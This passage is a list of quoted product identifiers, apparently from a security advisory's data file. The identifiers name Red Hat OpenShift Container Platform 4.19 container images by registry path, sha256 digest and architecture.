"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
